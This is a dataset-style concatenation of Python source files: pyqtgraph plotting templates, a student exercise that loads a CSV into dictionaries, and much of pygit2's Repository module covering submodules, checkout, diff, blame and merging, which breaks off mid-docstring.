self.plot_items[trial_set]['upper'].setData(x=x, y=y + se)
self.plot_items[trial_set]['fill'].setCurves(self.plot_items[trial_set]['upper'],
self.plot_items[trial_set]['lower'])
plot_info['fill'].setAlpha(50)
self.plot_items[trial_set]['fill'].setBrush(plot_info['fill'])
# find the correct y range based on all the lines on the plot
y_min = np.nanmin([val['yrange'][0] for _, val in self.plot_items.items()])
y_max = np.nanmax([val['yrange'][1] for _, val in self.plot_items.items()])
self.fig.setXRange(min=np.min(x), max=np.max(x))
self.fig.setYRange(min=0.95 * y_min, max=1.05 * y_max)
if ylabel is not None:
self.fig.setLabel('left', ylabel)
def plot_line(self, x, y):
self.plot_item.setData(x=x, y=y)
self.plot_item.setPen('b')
self.fig.setXRange(min=np.min(x), max=np.max(x))
self.fig.setYRange(min=0.95 * np.min(y), max=1.05 * np.max(y))
class ImageTemplate:
def __init__(self, xlabel, ylabel):
self.fig = pg.PlotWidget(background='w')
self.fig.setLabel('bottom', xlabel)
self.fig.setLabel('left', ylabel)
self.fig.scene().sigMouseMoved.connect(self.on_mouse_hover)
self.image = pg.ImageItem()
self.fig.addItem(self.image)
self.fig.plotItem.addLine(x=0, pen=colours['line'])
self.text_popup = pg.TextItem(color=colours['line'])
font = QtGui.QFont()
font.setPointSize(8)
font.setBold(True)
self.text_popup.setFont(font)
self.text_popup.hide()
self.fig.addItem(self.text_popup)
self.region_items = []
self.regions = None
self.region_text = None
def reset(self):
self.image.setImage()
def plot(self, image, t, cmap='binary', clevels=(0, 1)):
# TODO makes sure this is in the order that you expect!!!
self.image.setImage(image.T)
self.x_range = [np.min(t), np.max(t)]
self.x_scale = (np.max(t) - np.min(t)) / image.shape[1]
transform = [self.x_scale, 0., 0., 0., 1., 0., np.min(t),
0., 1.]
self.image.setTransform(QtGui.QTransform(*transform))
color_bar = cb.ColorBar(cmap)
lut = color_bar.getColourMap()
self.image.setLookupTable(lut)
self.image.setLevels(clevels)
self.fig.setXRange(min=np.min(t), max=np.max(t))
self.fig.setYRange(min=0, max=image.shape[0])
def add_regions(self, regions, region_info):
self.regions = regions
self.region_text = region_info['text']
for reg, col in zip(self.regions, region_info['colours']):
# Hack so we can easily revert to the coloured option if users prefer
col.setAlpha(0)
region = pg.LinearRegionItem(values=(reg[0], reg[1]), brush=col, pen=colours['line'],
movable=False, orientation='horizontal')
self.fig.plotItem.addItem(region)
self.region_items.append(region)
def remove_regions(self):
for reg in self.region_items:
self.fig.plotItem.removeItem(reg)
def on_mouse_hover(self, pos):
if len(self.regions) > 0:
pos = self.image.mapFromScene(pos)
# only show if mouse is in x range
if ((pos.x() * self.x_scale) + self.x_range[0] > self.x_range[0]) & \
((pos.x() * self.x_scale) + self.x_range[0] < self.x_range[1]):
if (pos.y() > np.min(np.min(self.regions))) & \
(pos.y() < np.max(np.max(self.regions))):
text = self.find_text(pos.y())
self.text_popup.setText(text)
self.text_popup.setPos((pos.x() * self.x_scale) + self.x_range[0] + 0.05,
pos.y() - 10)
self.text_popup.show()
else:
self.text_popup.hide()
else:
self.text_popup.hide()
else:
self.text_popup.hide()
def find_text(self, y):
idx = [i for i, val in enumerate(self.regions) if (y > val[0]) & (y < val[1])][0]
return self.region_text[idx]
class ScatterTemplate:
def __init__(self, xlabel, ylabel):
self.fig = pg.PlotWidget(background='w')
self.fig.setLabel('bottom', xlabel)
self.fig.setLabel('left', ylabel)
self.fig.scene().sigMouseMoved.connect(self.on_mouse_hover)
self.scatter = pg.ScatterPlotItem()
self.fig.addItem(self.scatter)
self.fig.plotItem.addLine(x=0, pen=colours['line'])
self.text_popup = pg.TextItem(color=colours['line'])
font = QtGui.QFont()
font.setPointSize(8)
font.setBold(True)
self.text_popup.setFont(font)
self.text_popup.hide()
self.fig.addItem(self.text_popup)
self.region_items = []
self.regions = None
self.region_text = None
def reset(self):
self.scatter.setData()
def plot(self, scatter, t, n_trials):
self.scatter.setData(x=scatter[:, 0], y=scatter[:, 1], size=1, symbol='s')
self.scatter.setPen('k')
self.fig.setXRange(min=t[0], max=t[1])
self.fig.setYRange(min=0, max=n_trials)
self.x_range = t
def add_regions(self, regions, region_info):
self.regions = regions
self.region_text = region_info['text']
for reg, col in zip(self.regions, region_info['colours']):
# Hack so we can easily revert to the coloured option if users prefer
col.setAlpha(0)
region = pg.LinearRegionItem(values=(reg[0], reg[1]), brush=col, pen=colours['line'],
movable=False, orientation='horizontal')
self.fig.plotItem.addItem(region)
self.region_items.append(region)
def remove_regions(self):
for reg in self.region_items:
self.fig.plotItem.removeItem(reg)
def on_mouse_hover(self, pos):
if len(self.regions) > 0:
pos = self.scatter.mapFromScene(pos)
# only show if mouse is in x range
if (pos.x() > self.x_range[0]) & (pos.x() < self.x_range[1]):
if (pos.y() > np.min(np.min(self.regions))) & \
(pos.y() < np.max(np.max(self.regions))):
text = self.find_text(pos.y())
self.text_popup.setText(text)
self.text_popup.setPos(pos.x() + 0.05, pos.y() - 10)
self.text_popup.show()
else:
self.text_popup.hide()
else:
self.text_popup.hide()
else:
self.text_popup.hide()
def find_text(self, y):
idx = [i for i, val in enumerate(self.regions) if (y > val[0]) & (y < val[1])][0]
return self.region_text[idx]
class BarTemplate:
def __init__(self, xlabel, ylabel):
self.fig = pg.PlotWidget(background='w')
self.fig.setMouseEnabled(x=False, y=False)
self.fig.setLabel('bottom', xlabel)
self.fig.setLabel('left', ylabel)
self.bar = pg.BarGraphItem(x=[0], height=[0], width=0)
self.fig.addItem(self.bar)
def reset(self):
self.bar.setOpts(x=[0], height=[0], width=0)
def plot(self, x, y):
self.fig.setXRange(min=np.min(x), max=np.max(x))
self.fig.setYRange(min=0, max=1.05 * np.max(y))
self.bar.setOpts(x=x, height=y, width=0.0009, brush='b')
| [
"mayo.faulkner@ucl.ac.uk"
] | mayo.faulkner@ucl.ac.uk |
bfd9671d940ff8189d3a8359ad4ba293d4df4e8d | 99507b26eb81315c8369ae95ef5c8d0ab816b50c | /assignment_Q14.py | dd9bb12ca6f006a6eb2b4e671efacba89c18aa29 | [] | no_license | sprajwol/python_assignment_II | 19d4f4807df4edb30e154ed527e4671f2eb88463 | cd9b0fc6cacc150e73e447f8884196a4959a1f88 | refs/heads/master | 2022-11-14T17:18:03.274873 | 2020-07-05T17:00:00 | 2020-07-05T17:00:00 | 276,271,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 527 | py | # 14. Write a function that reads a CSV file. It should return a list of
# dictionaries, using the first row as key names, and each subsequent
# row as values for those keys.
# For the data in the previous example it would return:
# [{'name': 'George', 'address': '4312 Abbey Road', 'age': 22}, {'name':
# 'John', 'address': '54 Love Ave', 'age': 21}]
import csv
with open('file.csv', 'r') as file:
reader = csv.DictReader(file)
result = []
for each_row in reader:
result.append(each_row)
print(result)
| [
"shakyaprajwol96@gmail.com"
] | shakyaprajwol96@gmail.com |
848af6d597acad3a8cac069ab9fa0f6804f89c32 | 6ae1d088d8849459cccfe35c27a76e28f3883130 | /venv/Lib/site-packages/pygit2/repository.py | a7180f9b0626c6fe18c0d62f0c5250ae98075a47 | [] | no_license | salmans71/python | 8ac91cd985b19fa8d67c8b73ea98ce208cc36ee2 | 9957967fe34d623a885dde699fd7b5cdcf0b8d07 | refs/heads/master | 2023-01-03T23:35:23.867001 | 2020-10-31T15:08:48 | 2020-10-31T15:08:48 | 308,904,629 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,851 | py | # Copyright 2010-2020 The pygit2 contributors
#
# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2,
# as published by the Free Software Foundation.
#
# In addition to the permissions in the GNU General Public License,
# the authors give you unlimited permission to link the compiled
# version of this file into combinations with other programs,
# and to distribute those combinations without any restriction
# coming from the use of this file. (The General Public License
# restrictions do apply in other respects; for example, they cover
# modification of the file, and distribution when not linked into
# a combined executable.)
#
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING. If not, write to
# the Free Software Foundation, 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
# Import from the Standard Library
from io import BytesIO
from string import hexdigits
import tarfile
from time import time
import warnings
# Import from pygit2
from ._pygit2 import Repository as _Repository, init_file_backend
from ._pygit2 import Oid, GIT_OID_HEXSZ, GIT_OID_MINPREFIXLEN
from ._pygit2 import GIT_CHECKOUT_SAFE, GIT_CHECKOUT_RECREATE_MISSING, GIT_DIFF_NORMAL
from ._pygit2 import GIT_FILEMODE_LINK
from ._pygit2 import GIT_BRANCH_LOCAL, GIT_BRANCH_REMOTE, GIT_BRANCH_ALL
from ._pygit2 import GIT_REF_SYMBOLIC
from ._pygit2 import Reference, Tree, Commit, Blob
from ._pygit2 import InvalidSpecError
from .callbacks import git_fetch_options
from .config import Config
from .errors import check_error
from .ffi import ffi, C
from .index import Index
from .remote import RemoteCollection
from .blame import Blame
from .utils import to_bytes, StrArray
from .submodule import Submodule
class BaseRepository(_Repository):
    def __init__(self, *args, **kwargs):
        """Initialise the repository.

        All positional and keyword arguments are forwarded unchanged to the
        C-backed base class (``_Repository``); the Python-side helper
        collections are then set up by :meth:`_common_init`.
        """
        super().__init__(*args, **kwargs)
        self._common_init()
    def _common_init(self):
        """Set up the Python-side helper state shared by all constructors."""
        self.branches = Branches(self)
        self.references = References(self)
        self.remotes = RemoteCollection(self)

        # Get the pointer as the contents of a buffer and store it for
        # later access: copy the raw bytes of the `git_repository *` held
        # by the C base class into a fresh cffi pointer-to-pointer, then
        # dereference it once so self._repo is a plain `git_repository *`
        # usable directly in C API calls.
        repo_cptr = ffi.new('git_repository **')
        ffi.buffer(repo_cptr)[:] = self._pointer[:]
        self._repo = repo_cptr[0]
# Backwards compatible ODB access
    def read(self, *args, **kwargs):
        """read(oid) -> type, data, size

        Read raw object data from the repository.

        Backwards-compatible alias: delegates to ``self.odb.read``.
        """
        return self.odb.read(*args, **kwargs)
    def write(self, *args, **kwargs):
        """write(type, data) -> Oid

        Write raw object data into the repository. First arg is the object
        type, the second one a buffer with data. Return the Oid of the created
        object.

        Backwards-compatible alias: delegates to ``self.odb.write``.
        """
        return self.odb.write(*args, **kwargs)
    def __iter__(self):
        """Iterate over the repository's object database (delegates to ``self.odb``)."""
        return iter(self.odb)
    def add_submodule(self, url, path, link=True, callbacks=None):
        """Add a submodule to the index.

        Returns: the submodule that was added.

        Parameters:

        url
            The URL of the submodule.

        path
            The path within the parent repository to add the submodule

        link
            Should workdir contain a gitlink to the repo in .git/modules vs. repo directly in workdir.

        callbacks
            Optional RemoteCallbacks used while cloning the submodule
            repository (progress, credentials, ...).
        """
        csub = ffi.new('git_submodule **')
        curl = ffi.new('char[]', to_bytes(url))
        cpath = ffi.new('char[]', to_bytes(path))
        # libgit2 expects an int flag, not a Python bool.
        gitlink = 1 if link else 0

        # Step 1: set up the submodule entry (libgit2 add_setup).
        err = C.git_submodule_add_setup(csub, self._repo, curl, cpath, gitlink)
        check_error(err)

        submodule_instance = Submodule._from_c(self, csub[0])

        # prepare options
        opts = ffi.new('git_submodule_update_options *')
        C.git_submodule_update_init_options(opts, C.GIT_SUBMODULE_UPDATE_OPTIONS_VERSION)

        # Step 2: clone the submodule repository, wiring the user callbacks
        # into the fetch options for the duration of the call.
        with git_fetch_options(callbacks, opts=opts.fetch_opts) as payload:
            crepo = ffi.new('git_repository **')
            err = C.git_submodule_clone(crepo, submodule_instance._subm, opts)
            payload.check_error(err)

        # clean-up the submodule repository: wrap the raw pointer so its
        # lifetime (and freeing) is owned by a Python Repository object.
        Repository._from_c(crepo[0], True)

        # Step 3: finalize, staging the new submodule in the index.
        err = C.git_submodule_add_finalize(submodule_instance._subm)
        check_error(err)
        return submodule_instance
def lookup_submodule(self, path):
"""
Lookup submodule information by name or path.
"""
csub = ffi.new('git_submodule **')
cpath = ffi.new('char[]', to_bytes(path))
err = C.git_submodule_lookup(csub, self._repo, cpath)
check_error(err)
return Submodule._from_c(self, csub[0])
def update_submodules(self, submodules=None, init=False, callbacks=None):
"""
Update a submodule. This will clone a missing submodule and checkout
the subrepository to the commit specified in the index of the
containing repository. If the submodule repository doesn't contain the
target commit (e.g. because fetchRecurseSubmodules isn't set), then the
submodule is fetched using the fetch options supplied in options.
"""
if submodules is None:
submodules = self.listall_submodules()
# prepare options
opts = ffi.new('git_submodule_update_options *')
C.git_submodule_update_init_options(opts, C.GIT_SUBMODULE_UPDATE_OPTIONS_VERSION)
with git_fetch_options(callbacks, opts=opts.fetch_opts) as payload:
i = 1 if init else 0
for submodule in submodules:
submodule_instance = self.lookup_submodule(submodule)
err = C.git_submodule_update(submodule_instance._subm, i, opts)
payload.check_error(err)
return None
#
# Mapping interface
#
def get(self, key, default=None):
value = self.git_object_lookup_prefix(key)
return value if (value is not None) else default
def __getitem__(self, key):
value = self.git_object_lookup_prefix(key)
if value is None:
raise KeyError(key)
return value
    def __contains__(self, key):
        """Whether *key* resolves to an object in this repository."""
        return self.git_object_lookup_prefix(key) is not None
def __repr__(self):
return "pygit2.Repository(%r)" % self.path
#
# Remotes
#
    def create_remote(self, name, url):
        """Deprecated — use ``Repository.remotes.create(name, url)`` instead.

        Kept for backwards compatibility: emits a DeprecationWarning and
        delegates to :attr:`remotes`.
        """
        warnings.warn("Use repo.remotes.create(..)", DeprecationWarning)
        return self.remotes.create(name, url)
#
# Configuration
#
@property
def config(self):
"""The configuration file for this repository.
If a the configuration hasn't been set yet, the default config for
repository will be returned, including global and system configurations
(if they are available).
"""
cconfig = ffi.new('git_config **')
err = C.git_repository_config(cconfig, self._repo)
check_error(err)
return Config.from_c(self, cconfig[0])
@property
def config_snapshot(self):
"""A snapshot for this repositiory's configuration
This allows reads over multiple values to use the same version
of the configuration files.
"""
cconfig = ffi.new('git_config **')
err = C.git_repository_config_snapshot(cconfig, self._repo)
check_error(err)
return Config.from_c(self, cconfig[0])
#
# References
#
def create_reference(self, name, target, force=False):
"""Create a new reference "name" which points to an object or to
another reference.
Based on the type and value of the target parameter, this method tries
to guess whether it is a direct or a symbolic reference.
Keyword arguments:
force
If True references will be overridden, otherwise (the default) an
exception is raised.
Examples::
repo.create_reference('refs/heads/foo', repo.head.target)
repo.create_reference('refs/tags/foo', 'refs/heads/master')
repo.create_reference('refs/tags/foo', 'bbb78a9cec580')
"""
direct = (
type(target) is Oid
or (
all(c in hexdigits for c in target)
and GIT_OID_MINPREFIXLEN <= len(target) <= GIT_OID_HEXSZ))
if direct:
return self.create_reference_direct(name, target, force)
return self.create_reference_symbolic(name, target, force)
def resolve_refish(self, refish):
"""Convert a reference-like short name "ref-ish" to a valid
(commit, reference) pair.
If ref-ish points to a commit, the reference element of the result
will be None.
Examples::
repo.resolve_refish('mybranch')
repo.resolve_refish('sometag')
repo.resolve_refish('origin/master')
repo.resolve_refish('bbb78a9')
"""
try:
reference = self.lookup_reference_dwim(refish)
except (KeyError, InvalidSpecError):
reference = None
commit = self.revparse_single(refish)
else:
commit = reference.peel(Commit)
return (commit, reference)
#
# Checkout
#
    @staticmethod
    def _checkout_args_to_options(strategy=None, directory=None, paths=None):
        """Build a ``git_checkout_options`` struct from keyword arguments.

        Returns a ``(copts, refs)`` pair.  ``refs`` collects the cffi
        objects (C strings, string arrays) that ``copts`` points into;
        the caller must keep it alive for as long as ``copts`` is used,
        otherwise the underlying C memory may be garbage-collected early.
        """
        # Create the options struct to pass
        copts = ffi.new('git_checkout_options *')
        check_error(C.git_checkout_init_options(copts, 1))

        # References we need to keep to strings and so forth
        refs = []

        # pygit2's default is SAFE | RECREATE_MISSING
        copts.checkout_strategy = GIT_CHECKOUT_SAFE | GIT_CHECKOUT_RECREATE_MISSING

        # and go through the arguments to see what the user wanted
        if strategy:
            copts.checkout_strategy = strategy

        if directory:
            target_dir = ffi.new('char[]', to_bytes(directory))
            refs.append(target_dir)
            copts.target_directory = target_dir

        if paths:
            strarray = StrArray(paths)
            refs.append(strarray)
            copts.paths = strarray.array[0]

        return copts, refs
def checkout_head(self, **kwargs):
"""Checkout HEAD
For arguments, see Repository.checkout().
"""
copts, refs = Repository._checkout_args_to_options(**kwargs)
check_error(C.git_checkout_head(self._repo, copts))
def checkout_index(self, index=None, **kwargs):
"""Checkout the given index or the repository's index
For arguments, see Repository.checkout().
"""
copts, refs = Repository._checkout_args_to_options(**kwargs)
check_error(C.git_checkout_index(self._repo, index._index if index else ffi.NULL, copts))
    def checkout_tree(self, treeish, **kwargs):
        """Checkout the given treeish

        For arguments, see Repository.checkout().
        """
        # 'refs' keeps any ffi-allocated strings alive until the call returns.
        copts, refs = Repository._checkout_args_to_options(**kwargs)

        # Copy the raw git_object pointer out of the Python wrapper so it can
        # be handed to libgit2.
        cptr = ffi.new('git_object **')
        ffi.buffer(cptr)[:] = treeish._pointer[:]
        check_error(C.git_checkout_tree(self._repo, cptr[0], copts))
def checkout(self, refname=None, **kwargs):
"""
Checkout the given reference using the given strategy, and update the
HEAD.
The reference may be a reference name or a Reference object.
The default strategy is GIT_CHECKOUT_SAFE | GIT_CHECKOUT_RECREATE_MISSING.
If no reference is given, checkout from the index.
Parameters:
refname : str or Reference
The reference to checkout. After checkout, the current branch will
be switched to this one.
strategy : int
A ``GIT_CHECKOUT_`` value. The default is ``GIT_CHECKOUT_SAFE``.
directory : str
Alternative checkout path to workdir.
paths : list[str]
A list of files to checkout from the given reference.
If paths is provided, HEAD will not be set to the reference.
Examples:
* To checkout from the HEAD, just pass 'HEAD'::
>>> checkout('HEAD')
This is identical to calling checkout_head().
"""
# Case 1: Checkout index
if refname is None:
return self.checkout_index(**kwargs)
# Case 2: Checkout head
if refname == 'HEAD':
return self.checkout_head(**kwargs)
# Case 3: Reference
if isinstance(refname, Reference):
reference = refname
refname = refname.name
else:
reference = self.lookup_reference(refname)
oid = reference.resolve().target
treeish = self[oid]
self.checkout_tree(treeish, **kwargs)
if 'paths' not in kwargs:
self.set_head(refname)
#
# Setting HEAD
#
def set_head(self, target):
"""
Set HEAD to point to the given target.
Parameters:
target
The new target for HEAD. Can be a string or Oid (to detach).
"""
if isinstance(target, Oid):
oid = ffi.new('git_oid *')
ffi.buffer(oid)[:] = target.raw[:]
err = C.git_repository_set_head_detached(self._repo, oid)
check_error(err)
return
# if it's a string, then it's a reference name
err = C.git_repository_set_head(self._repo, to_bytes(target))
check_error(err)
#
# Diff
#
def __whatever_to_tree_or_blob(self, obj):
if obj is None:
return None
# If it's a string, then it has to be valid revspec
if isinstance(obj, str) or isinstance(obj, bytes):
obj = self.revparse_single(obj)
elif isinstance(obj, Oid):
obj = self[obj]
# First we try to get to a blob
try:
obj = obj.peel(Blob)
except Exception:
# And if that failed, try to get a tree, raising a type
# error if that still doesn't work
try:
obj = obj.peel(Tree)
except Exception:
raise TypeError('unexpected "%s"' % type(obj))
return obj
def diff(self, a=None, b=None, cached=False, flags=GIT_DIFF_NORMAL,
context_lines=3, interhunk_lines=0):
"""
Show changes between the working tree and the index or a tree,
changes between the index and a tree, changes between two trees, or
changes between two blobs.
Keyword arguments:
a
None, a str (that refers to an Object, see revparse_single()) or a
Reference object.
If None, b must be None, too. In this case the working directory is
compared with the index. Otherwise the referred object is compared to
'b'.
b
None, a str (that refers to an Object, see revparse_single()) or a
Reference object.
If None, the working directory is compared to 'a'. (except
'cached' is True, in which case the index is compared to 'a').
Otherwise the referred object is compared to 'a'
cached
If 'b' is None, by default the working directory is compared to 'a'.
If 'cached' is set to True, the index/staging area is used for comparing.
flag
A combination of GIT_DIFF_* constants. For a list of the constants,
with a description, see git_diff_option_t in
https://github.com/libgit2/libgit2/blob/master/include/git2/diff.h
context_lines
The number of unchanged lines that define the boundary of a hunk
(and to display before and after)
interhunk_lines
The maximum number of unchanged lines between hunk boundaries
before the hunks will be merged into a one
Examples::
# Changes in the working tree not yet staged for the next commit
>>> diff()
# Changes between the index and your last commit
>>> diff(cached=True)
# Changes in the working tree since your last commit
>>> diff('HEAD')
# Changes between commits
>>> t0 = revparse_single('HEAD')
>>> t1 = revparse_single('HEAD^')
>>> diff(t0, t1)
>>> diff('HEAD', 'HEAD^') # equivalent
If you want to diff a tree against an empty tree, use the low level
API (Tree.diff_to_tree()) directly.
"""
a = self.__whatever_to_tree_or_blob(a)
b = self.__whatever_to_tree_or_blob(b)
opt_keys = ['flags', 'context_lines', 'interhunk_lines']
opt_values = [flags, context_lines, interhunk_lines]
# Case 1: Diff tree to tree
if isinstance(a, Tree) and isinstance(b, Tree):
return a.diff_to_tree(b, **dict(zip(opt_keys, opt_values)))
# Case 2: Index to workdir
elif a is None and b is None:
return self.index.diff_to_workdir(*opt_values)
# Case 3: Diff tree to index or workdir
elif isinstance(a, Tree) and b is None:
if cached:
return a.diff_to_index(self.index, *opt_values)
else:
return a.diff_to_workdir(*opt_values)
# Case 4: Diff blob to blob
if isinstance(a, Blob) and isinstance(b, Blob):
return a.diff(b)
raise ValueError("Only blobs and treeish can be diffed")
def state_cleanup(self):
"""Remove all the metadata associated with an ongoing command like
merge, revert, cherry-pick, etc. For example: MERGE_HEAD, MERGE_MSG,
etc.
"""
C.git_repository_state_cleanup(self._repo)
#
# blame
#
def blame(self, path, flags=None, min_match_characters=None,
newest_commit=None, oldest_commit=None, min_line=None,
max_line=None):
"""
Return a Blame object for a single file.
Parameters:
path
Path to the file to blame.
flags
A GIT_BLAME_* constant.
min_match_characters
The number of alphanum chars that must be detected as moving/copying
within a file for it to associate those lines with the parent commit.
newest_commit
The id of the newest commit to consider.
oldest_commit
The id of the oldest commit to consider.
min_line
The first line in the file to blame.
max_line
The last line in the file to blame.
Examples::
repo.blame('foo.c', flags=GIT_BLAME_TRACK_COPIES_SAME_FILE)
"""
options = ffi.new('git_blame_options *')
C.git_blame_init_options(options, C.GIT_BLAME_OPTIONS_VERSION)
if min_match_characters:
options.min_match_characters = min_match_characters
if newest_commit:
if not isinstance(newest_commit, Oid):
newest_commit = Oid(hex=newest_commit)
ffi.buffer(ffi.addressof(options, 'newest_commit'))[:] = newest_commit.raw
if oldest_commit:
if not isinstance(oldest_commit, Oid):
oldest_commit = Oid(hex=oldest_commit)
ffi.buffer(ffi.addressof(options, 'oldest_commit'))[:] = oldest_commit.raw
if min_line:
options.min_line = min_line
if max_line:
options.max_line = max_line
cblame = ffi.new('git_blame **')
err = C.git_blame_file(cblame, self._repo, to_bytes(path), options)
check_error(err)
return Blame._from_c(self, cblame[0])
#
# Index
#
    @property
    def index(self):
        """Index representing the repository's index file."""
        cindex = ffi.new('git_index **')
        err = C.git_repository_index(cindex, self._repo)
        # NOTE(review): io=True presumably maps failures to I/O-style
        # exceptions in check_error — confirm against check_error's contract.
        check_error(err, io=True)

        return Index.from_c(self, cindex)
#
# Merging
#
_FAVOR_TO_ENUM = {
'normal': C.GIT_MERGE_FILE_FAVOR_NORMAL,
'ours': C.GIT_MERGE_FILE_FAVOR_OURS,
'theirs': C.GIT_MERGE_FILE_FAVOR_THEIRS,
'union': C.GIT_MERGE_FILE_FAVOR_UNION,
}
_MERGE_FLAG_TO_ENUM = {
'find_renames': C.GIT_MERGE_FIND_RENAMES,
'fail_on_conflict': C.GIT_MERGE_FAIL_ON_CONFLICT,
'skip_reuc': C.GIT_MERGE_SKIP_REUC,
'no_recursive': C.GIT_MERGE_NO_RECURSIVE,
}
_MERGE_FLAG_DEFAULTS = {
'find_renames': True,
}
_MERGE_FILE_FLAG_TO_ENUM = {
'standard_style': C.GIT_MERGE_FILE_STYLE_MERGE,
'diff3_style': C.GIT_MERGE_FILE_STYLE_DIFF3,
'simplify_alnum': C.GIT_MERGE_FILE_SIMPLIFY_ALNUM,
'ignore_whitespace': C.GIT_MERGE_FILE_IGNORE_WHITESPACE,
'ignore_whitespace_change': C.GIT_MERGE_FILE_IGNORE_WHITESPACE_CHANGE,
'ignore_whitespace_eol': C.GIT_MERGE_FILE_IGNORE_WHITESPACE_EOL,
'patience': C.GIT_MERGE_FILE_DIFF_PATIENCE,
'minimal': C.GIT_MERGE_FILE_DIFF_MINIMAL,
}
_MERGE_FILE_FLAG_DEFAULTS = {}
@classmethod
def _flag_dict_to_bitmask(cls, flag_dict, flag_defaults, mapping, label):
"""
Converts a dict eg {"find_renames": True, "skip_reuc": True} to
a bitmask eg C.GIT_MERGE_FIND_RENAMES | C.GIT_MERGE_SKIP_REUC.
"""
merged_dict = {**flag_defaults, **flag_dict}
bitmask = 0
for k, v in merged_dict.items():
enum = mapping.get(k, None)
if enum is None:
raise ValueError("unknown %s: %s" % (label, k))
if v:
bitmask |= enum
return bitmask
@classmethod
def _merge_options(cls, favor='normal', flags={}, file_flags={}):
"""Return a 'git_merge_opts *'"""
favor_val = cls._FAVOR_TO_ENUM.get(favor, None)
if favor_val is None:
raise ValueError("unknown favor: %s" % favor)
flags_bitmask = Repository._flag_dict_to_bitmask(
flags,
cls._MERGE_FLAG_DEFAULTS,
cls._MERGE_FLAG_TO_ENUM,
"merge flag"
)
file_flags_bitmask = cls._flag_dict_to_bitmask(
file_flags,
cls._MERGE_FILE_FLAG_DEFAULTS,
cls._MERGE_FILE_FLAG_TO_ENUM,
"merge file_flag"
)
opts = ffi.new('git_merge_options *')
err = C.git_merge_init_options(opts, C.GIT_MERGE_OPTIONS_VERSION)
check_error(err)
opts.file_favor = favor_val
opts.flags = flags_bitmask
opts.file_flags = file_flags_bitmask
return opts
    def merge_file_from_index(self, ancestor, ours, theirs):
        """Merge files from index. Return a string with the merge result
        containing possible conflicts.

        ancestor
            The index entry which will be used as a common
            ancestor.
        ours
            The index entry to take as "ours" or base.
        theirs
            The index entry which will be merged into "ours"
        """
        cmergeresult = ffi.new('git_merge_file_result *')

        # Each _to_c() returns (struct, keep-alive ref); the *_str_ref
        # locals must stay in scope until the C call below returns, because
        # the structs borrow pointers into them.
        cancestor, ancestor_str_ref = (
            ancestor._to_c() if ancestor is not None else (ffi.NULL, ffi.NULL))
        cours, ours_str_ref = (
            ours._to_c() if ours is not None else (ffi.NULL, ffi.NULL))
        ctheirs, theirs_str_ref = (
            theirs._to_c() if theirs is not None else (ffi.NULL, ffi.NULL))

        err = C.git_merge_file_from_index(
            cmergeresult, self._repo,
            cancestor, cours, ctheirs,
            ffi.NULL);
        check_error(err)

        # Copy the result out before freeing the C-side buffer.
        ret = ffi.string(cmergeresult.ptr,
                         cmergeresult.len).decode('utf-8')
        C.git_merge_file_result_free(cmergeresult)

        return ret
def merge_commits(self, ours, theirs, favor='normal', flags={}, file_flags={}):
"""
Merge two arbitrary commits.
Returns: an index with the result of the merge.
Parameters:
ours
The commit to take as "ours" or base.
theirs
The commit which will be merged into "ours"
favor
How to deal with file-level conflicts. Can be one of
* normal (default). Conflicts will be preserved.
* ours. The "ours" side of the conflict region is used.
* theirs. The "theirs" side of the conflict region is used.
* union. Unique lines from each side will be used.
For all but NORMAL, the index will not record a conflict.
flags
A dict of str: bool to turn on or off functionality while merging.
If a key is not present, the default will be used. The keys are:
* find_renames. Detect file renames. Defaults to True.
* fail_on_conflict. If a conflict occurs, exit immediately instead
of attempting to continue resolving conflicts.
* skip_reuc. Do not write the REUC extension on the generated index.
* no_recursive. If the commits being merged have multiple merge
bases, do not build a recursive merge base (by merging the
multiple merge bases), instead simply use the first base.
file_flags
A dict of str: bool to turn on or off functionality while merging.
If a key is not present, the default will be used. The keys are:
* standard_style. Create standard conflicted merge files.
* diff3_style. Create diff3-style file.
* simplify_alnum. Condense non-alphanumeric regions for simplified
diff file.
* ignore_whitespace. Ignore all whitespace.
* ignore_whitespace_change. Ignore changes in amount of whitespace.
* ignore_whitespace_eol. Ignore whitespace at end of line.
* patience. Use the "patience diff" algorithm
* minimal. Take extra time to find minimal diff
Both "ours" and "theirs" can be any object which peels to a commit or
the id (string or Oid) of an object which peels to a commit.
"""
ours_ptr = ffi.new('git_commit **')
theirs_ptr = ffi.new('git_commit **')
cindex = ffi.new('git_index **')
if isinstance(ours, (str, Oid)):
ours = self[ours]
if isinstance(theirs, (str, Oid)):
theirs = self[theirs]
ours = ours.peel(Commit)
theirs = theirs.peel(Commit)
opts = self._merge_options(favor, flags, file_flags)
ffi.buffer(ours_ptr)[:] = ours._pointer[:]
ffi.buffer(theirs_ptr)[:] = theirs._pointer[:]
err = C.git_merge_commits(cindex, self._repo, ours_ptr[0], theirs_ptr[0], opts)
check_error(err)
return Index.from_c(self, cindex)
def merge_trees(self, ancestor, ours, theirs, favor='normal', flags={}, file_flags={}):
"""
Merge two trees.
Returns: an Index that reflects the result of the merge.
Parameters:
ancestor
The tree which is the common ancestor between 'ours' and 'theirs'.
ours
The commit to take as "ours" or base.
theirs
The commit which will be merged into "ours".
favor
How to deal with file-level conflicts. Can be one of:
* normal (default). Conflicts will be preserved.
* ours. The "ours" side of the conflict region is used.
* theirs. The "theirs" side of the conflict region is used.
* union. Unique lines from each side will be used.
For all but NORMAL, the index will not record a conflict.
flags
A dict of str: bool to turn on or off functionality while merging.
If a key is not present, the default will be used. The keys are:
* find_renames. Detect file renames. Defaults to True.
* fail_on_conflict. If a conflict occurs, exit immediately instead
of attempting to continue resolving conflicts.
* skip_reuc. Do not write the REUC extension on the generated index.
* no_recursive. If the commits being merged have multiple merge
bases, do not build a recursive merge base (by merging the
multiple merge bases), instead simply use the first base.
file_flags
A dict of str: bool to turn on or off functionality while merging.
If a key is not present, the default will be used. The keys are:
* standard_style. Create standard conflicted merge files.
* diff3_style. Create diff3-style file.
* simplify_alnum. Condense non-alphanumeric regions for simplified
diff file.
* ignore_whitespace. Ignore all whitespace.
* ignore_whitespace_change. Ignore changes in amount of whitespace.
* ignore_whitespace_eol. Ignore whitespace at end of line.
* patience. Use the "patience diff" algorithm
